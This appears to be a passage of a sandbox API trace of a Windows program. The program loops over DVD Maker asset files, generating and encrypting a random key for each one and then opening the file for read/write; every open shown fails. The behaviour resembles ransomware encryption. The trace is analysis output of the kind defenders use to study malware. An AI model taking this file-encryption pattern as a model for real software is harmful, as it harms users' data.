[0093.304] GetProcessHeap () returned 0x2c0000 [0093.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.304] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa18*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa18*=0x30) returned 1 [0093.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.310] GetProcessHeap () returned 0x2c0000 [0093.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.310] GetProcessHeap () returned 0x2c0000 [0093.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e638 | out: hHeap=0x2c0000) returned 1 [0093.310] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa20 | out: pbBuffer=0x270fa20) returned 1 [0093.310] GetProcessHeap () returned 0x2c0000 [0093.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.310] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa18*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa18*=0x30) returned 1 [0093.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.320] GetProcessHeap () returned 0x2c0000 [0093.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.320] GetProcessHeap () returned 0x2c0000 [0093.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0093.320] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa18 | out: pbBuffer=0x270fa18) returned 1 [0093.320] GetProcessHeap () returned 0x2c0000 [0093.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa10*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa10*=0x30) returned 1 [0093.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.320] GetProcessHeap () returned 0x2c0000 [0093.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.320] GetProcessHeap () returned 0x2c0000 [0093.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0093.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa18 | out: pbBuffer=0x270fa18) returned 1 [0093.321] GetProcessHeap () returned 0x2c0000 [0093.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.321] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa10*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa10*=0x30) returned 1 [0093.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.321] GetProcessHeap () returned 0x2c0000 [0093.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.321] GetProcessHeap () returned 0x2c0000 [0093.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358200 | out: hHeap=0x2c0000) returned 1 [0093.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa10 | out: pbBuffer=0x270fa10) returned 1 [0093.321] GetProcessHeap () returned 0x2c0000 [0093.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.321] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa08*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa08*=0x30) returned 1 [0093.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.323] GetProcessHeap () returned 0x2c0000 [0093.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.323] GetProcessHeap () returned 0x2c0000 [0093.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378390 | out: hHeap=0x2c0000) returned 1 [0093.323] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa10 | out: pbBuffer=0x270fa10) returned 1 [0093.323] GetProcessHeap () returned 0x2c0000 [0093.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.323] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa08*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa08*=0x30) returned 1 [0093.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.324] GetProcessHeap () returned 0x2c0000 [0093.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.324] GetProcessHeap () returned 0x2c0000 [0093.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e7e8 | out: hHeap=0x2c0000) returned 1 [0093.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa08 | out: pbBuffer=0x270fa08) returned 1 [0093.324] GetProcessHeap () returned 0x2c0000 [0093.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa00*=0x30) returned 1 [0093.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.324] GetProcessHeap () returned 0x2c0000 [0093.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.324] GetProcessHeap () returned 0x2c0000 [0093.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377428 | out: hHeap=0x2c0000) returned 1 [0093.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa08 | out: pbBuffer=0x270fa08) returned 1 [0093.324] GetProcessHeap () returned 0x2c0000 [0093.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa00*=0x30) returned 1 [0093.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.326] GetProcessHeap () returned 0x2c0000 [0093.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.326] GetProcessHeap () returned 0x2c0000 [0093.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0093.326] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa00 | out: pbBuffer=0x270fa00) returned 1 [0093.326] GetProcessHeap () returned 0x2c0000 [0093.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9f8*=0x30) returned 1 [0093.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.327] GetProcessHeap () returned 0x2c0000 [0093.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.327] GetProcessHeap () returned 0x2c0000 [0093.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0093.327] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa00 | out: pbBuffer=0x270fa00) returned 1 [0093.327] GetProcessHeap () returned 0x2c0000 [0093.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9f8*=0x30) returned 1 [0093.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.327] GetProcessHeap () returned 0x2c0000 [0093.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.327] GetProcessHeap () returned 0x2c0000 [0093.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3469c8 | out: hHeap=0x2c0000) returned 1 [0093.327] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9f8 | out: pbBuffer=0x270f9f8) returned 1 [0093.327] GetProcessHeap () returned 0x2c0000 [0093.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.328] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9f0*=0x30) returned 1 [0093.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.329] GetProcessHeap () returned 0x2c0000 [0093.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.330] GetProcessHeap () returned 0x2c0000 [0093.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358610 | out: hHeap=0x2c0000) returned 1 [0093.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9f8 | out: pbBuffer=0x270f9f8) returned 1 [0093.330] GetProcessHeap () returned 0x2c0000 [0093.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.330] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9f0*=0x30) returned 1 [0093.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.330] GetProcessHeap () returned 0x2c0000 [0093.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.330] GetProcessHeap () returned 0x2c0000 [0093.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0093.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9f0 | out: pbBuffer=0x270f9f0) returned 1 [0093.330] GetProcessHeap () returned 0x2c0000 [0093.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.330] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9e8*=0x30) returned 1 [0093.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.330] GetProcessHeap () returned 0x2c0000 [0093.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.331] GetProcessHeap () returned 0x2c0000 [0093.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377d38 | out: hHeap=0x2c0000) returned 1 [0093.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9f0 | out: pbBuffer=0x270f9f0) returned 1 [0093.331] GetProcessHeap () returned 0x2c0000 [0093.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9e8*=0x30) returned 1 [0093.331] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.333] GetProcessHeap () returned 0x2c0000 [0093.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.333] GetProcessHeap () returned 0x2c0000 [0093.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0093.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9e8 | out: pbBuffer=0x270f9e8) returned 1 [0093.333] GetProcessHeap () returned 0x2c0000 [0093.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9e0*=0x30) returned 1 [0093.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.333] GetProcessHeap () returned 0x2c0000 [0093.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.333] GetProcessHeap () returned 0x2c0000 [0093.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0093.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9e8 | out: pbBuffer=0x270f9e8) returned 1 [0093.333] GetProcessHeap () returned 0x2c0000 [0093.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.334] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9e0*=0x30) returned 1 [0093.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.334] GetProcessHeap () returned 0x2c0000 [0093.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.334] GetProcessHeap () returned 0x2c0000 [0093.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0093.334] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9e0 | out: pbBuffer=0x270f9e0) returned 1 [0093.334] GetProcessHeap () returned 0x2c0000 [0093.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.334] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9d8*=0x30) returned 1 [0093.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.336] GetProcessHeap () returned 0x2c0000 [0093.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.336] GetProcessHeap () returned 0x2c0000 [0093.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346488 | out: hHeap=0x2c0000) returned 1 [0093.337] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9e0 | out: pbBuffer=0x270f9e0) returned 1 [0093.337] GetProcessHeap () returned 0x2c0000 [0093.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.337] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9d8*=0x30) returned 1 [0093.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.337] GetProcessHeap () returned 0x2c0000 [0093.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.337] GetProcessHeap () returned 0x2c0000 [0093.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377f08 | out: hHeap=0x2c0000) returned 1 [0093.337] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9d8 | out: pbBuffer=0x270f9d8) returned 1 [0093.337] GetProcessHeap () returned 0x2c0000 [0093.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.337] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9d0*=0x30) returned 1 [0093.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.337] GetProcessHeap () returned 0x2c0000 [0093.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.337] GetProcessHeap () returned 0x2c0000 [0093.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0093.337] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9d8 | out: pbBuffer=0x270f9d8) returned 1 [0093.338] GetProcessHeap () returned 0x2c0000 [0093.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9d0*=0x30) returned 1 [0093.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.338] GetProcessHeap () returned 0x2c0000 [0093.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.338] GetProcessHeap () returned 0x2c0000 [0093.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a360 | out: hHeap=0x2c0000) returned 1 [0093.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9d0 | out: pbBuffer=0x270f9d0) returned 1 [0093.338] GetProcessHeap () returned 0x2c0000 [0093.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9c8*=0x30) returned 1 [0093.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.338] GetProcessHeap () returned 0x2c0000 [0093.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.338] GetProcessHeap () returned 0x2c0000 [0093.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ef68 | out: hHeap=0x2c0000) returned 1 [0093.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9d0 | out: pbBuffer=0x270f9d0) returned 1 [0093.338] GetProcessHeap () returned 0x2c0000 [0093.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9c8*=0x30) returned 1 [0093.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.339] GetProcessHeap () returned 0x2c0000 [0093.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: 